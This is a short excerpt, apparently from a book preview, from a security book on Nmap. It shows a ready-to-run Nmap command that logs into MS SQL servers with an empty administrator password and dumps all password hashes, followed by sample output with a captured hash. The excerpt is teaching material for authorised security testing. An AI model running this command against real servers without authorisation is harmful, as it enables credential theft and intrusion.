May 2017
Intermediate to advanced
416 pages
21h 33m
English
To dump all the password hashes of a MS SQL server with an empty system administrator password, run the following Nmap command:
$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
The password hashes will be included in the ms-sql-dump-hashes script output section:
PORT STATE SERVICE VERSION 1433/tcp open ms-sql-s Microsoft SQL Server 2011 Service Info: CPE: cpe:/o:microsoft:windows Host script results: | ms-sql-empty-password: | [192.168.1.102\MSSQLSERVER] |_ sa:<empty> => Login Success | ms-sql-dump-hashes: | [192.168.1.102\MSSQLSERVER] | sa:0x020039AE3752898DF2D260F2D4DC7F09AB9E47BAB2EA3E1A472F4 9520C26E206D0613E34E92BF929F53C463C5B7DED53738A7FC0790DD68CF1 565469207A50F98998C7E5C610 | ...
Read now
Unlock full access